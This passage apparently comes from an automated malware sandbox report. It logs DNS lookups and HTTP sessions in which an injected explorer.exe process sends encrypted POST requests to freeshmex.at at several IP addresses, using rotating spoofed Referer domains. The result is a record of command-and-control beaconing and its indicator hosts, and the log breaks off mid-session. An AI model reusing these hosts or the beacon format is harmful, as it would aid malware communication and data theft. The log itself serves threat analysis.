                                                        Nov 20, 2022 23:29:41.305578947 CET8.8.8.8192.168.2.40x89f0No error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:41.305578947 CET8.8.8.8192.168.2.40x89f0No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:41.305578947 CET8.8.8.8192.168.2.40x89f0No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:41.305578947 CET8.8.8.8192.168.2.40x89f0No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:41.305578947 CET8.8.8.8192.168.2.40x89f0No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:42.687516928 CET8.8.8.8192.168.2.40xe9d7No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:42.687516928 CET8.8.8.8192.168.2.40xe9d7No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:42.687516928 CET8.8.8.8192.168.2.40xe9d7No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:42.687516928 CET8.8.8.8192.168.2.40xe9d7No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:42.687516928 CET8.8.8.8192.168.2.40xe9d7No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:42.687516928 CET8.8.8.8192.168.2.40xe9d7No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:42.687516928 CET8.8.8.8192.168.2.40xe9d7No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:42.687516928 CET8.8.8.8192.168.2.40xe9d7No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:42.687516928 CET8.8.8.8192.168.2.40xe9d7No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:42.687516928 CET8.8.8.8192.168.2.40xe9d7No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:44.211040020 CET8.8.8.8192.168.2.40xb599No error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:44.211040020 CET8.8.8.8192.168.2.40xb599No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:44.211040020 CET8.8.8.8192.168.2.40xb599No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:44.211040020 CET8.8.8.8192.168.2.40xb599No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:44.211040020 CET8.8.8.8192.168.2.40xb599No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:44.211040020 CET8.8.8.8192.168.2.40xb599No error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:44.211040020 CET8.8.8.8192.168.2.40xb599No error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:44.211040020 CET8.8.8.8192.168.2.40xb599No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:44.211040020 CET8.8.8.8192.168.2.40xb599No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:44.211040020 CET8.8.8.8192.168.2.40xb599No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • thepokeway.nl
                                                        • idgtg.org
                                                          • freeshmex.at
                                                        • iatco.com
                                                        • svuhccb.net
                                                        • xmevykp.org
                                                        • pewoqsllm.net
                                                        • 123.253.32.170
                                                        • vhuqghmu.org
                                                        • xwljygwi.com
                                                        • mubvqnkrma.org
                                                        • wtnnoq.net
                                                        • ulhgwivcot.net
                                                        • pydpo.com
                                                        • ebktpqpafx.org
                                                        • asqgcaowns.org
                                                        • wjowxl.org
                                                        • ltpqmt.com
                                                        • dlkbyd.org
                                                        • bvcqra.net
                                                        • qmtttoldxo.com
                                                        • hubudix.com
                                                        • feciyrtt.com
                                                        • mwivfd.com
                                                        • iqeagnejjt.org
                                                        • epgfrxxkra.net
                                                        • jksmgkjj.org
                                                        • ctvfqb.org
                                                        • sopric.com
                                                        • nyiltqe.net
                                                        • kqevfdrdxv.net
                                                        • hkqddhkgrs.org
                                                        • vppnf.com
                                                        • jlawl.com
                                                        • lccctghley.com
                                                        • gkaof.com
                                                        • wwdygs.org

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.4497165.135.247.111443C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.44969841.41.255.23580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:28:58.483763933 CET148OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://idgtg.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 310
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:28:58.483799934 CET148OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 1c ff 83
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA .[k,vu;XRd~kGA=Hi+t"^9I]V^mcp"P )^|1b=Z~pQ:_-X%W^t^P}An:R>y
                                                        Nov 20, 2022 23:28:58.901444912 CET148INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:28:58 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 8
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 04 00 00 00 72 e8 87 ed
                                                        Data Ascii: r


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        10192.168.2.44970741.41.255.23580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:12.646313906 CET1359OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://wtnnoq.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 277
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:12.646435976 CET1359OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 2a 4f ed bc
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu*OGZ'CcEKyYw13SFPviS^eD& 6.W;5g^P-Km$d5RTk*j|xr]
                                                        Nov 20, 2022 23:29:13.063014984 CET1360INHTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:12 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        11192.168.2.449708190.140.74.4380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:13.661755085 CET1361OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://ulhgwivcot.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 270
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:13.661802053 CET1361OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 71 2a a1 ac
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuq*`S^'\&qu_xZ2j6EMa9:G W>+d#EcCEiw+|,Zh'!C;OX;::
                                                        Nov 20, 2022 23:29:14.547209024 CET1362INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:14 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        12192.168.2.44970941.41.255.23580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:14.755305052 CET1363OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://pydpo.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 230
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:14.755305052 CET1363OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 6f 17 ad b7
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuoAkH=wUo<,ZCoUM|**ALp[031pLD$VBPhw#h!jL@P[
                                                        Nov 20, 2022 23:29:15.188577890 CET1363INHTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:14 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        13192.168.2.449710190.140.74.4380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:15.417911053 CET1365OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://ebktpqpafx.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 253
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:15.418381929 CET1365OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 4e 37 d3 a0
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuN7DPRk~2D*oluu7R2l^Lw#T'n_\{pI`E91>F6~yq\87zIc?!y
                                                        Nov 20, 2022 23:29:16.315767050 CET1365INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:15 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        14192.168.2.449711190.147.188.5080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:16.771595955 CET1367OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://asqgcaowns.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 338
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:16.771632910 CET1367OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 4c 34 fc ee
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuL4T+I+EBK]@_i@<o/7GFDW6h})j5M}yL|)%0]gJE|+Owh*
                                                        Nov 20, 2022 23:29:17.579442978 CET1367INHTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:17 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        15192.168.2.449712190.140.74.4380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:17.825717926 CET1368OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://wjowxl.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 245
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:17.825717926 CET1369OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 41 5b ed f3
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuA[ZqkK{O3iwEvH4X\%FR#^I`(A} cQ51e(Zn]>k''U+y{jXX"Az6Gs
                                                        Nov 20, 2022 23:29:18.733083010 CET1369INHTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:18 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        16192.168.2.44971341.41.255.23580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:18.844870090 CET1370OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://ltpqmt.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 156
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:18.844870090 CET1370OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5b 0d ea e2
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu[T[*VW8z*U@et_fY9nP-(Uv~/=
                                                        Nov 20, 2022 23:29:19.285669088 CET1371INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:19 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        17192.168.2.449714222.236.49.12380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:19.586363077 CET1372OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://dlkbyd.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 261
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:19.586421967 CET1372OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 2c 20 cd f3
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu, xMXc3K~6m4Gd\X?!B/h BYgbGe7tSSnf*\27"xwoSQ(|;'
                                                        Nov 20, 2022 23:29:20.763540030 CET1373INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:20 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        18192.168.2.449715138.36.3.13480C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:20.999356985 CET1374OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://bvcqra.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 157
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:20.999810934 CET1374OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 25 22 e9 a6
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu%"J>f[SD w~^f-;PdgPOl:HASw\%
                                                        Nov 20, 2022 23:29:21.939101934 CET1375INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:21 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 50
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1f 62 43 e4 37 01 fe ef 46 ea d0 ec a6 6d 81 3e d9 f7 22 5e 5a 85 84 8b cb 7c 9a 2e 1d 03
                                                        Data Ascii: #\6bC7Fm>"^Z|.


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        19192.168.2.44971741.41.255.23580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:23.322921991 CET2008OUTPOST /tmp/ HTTP/1.1
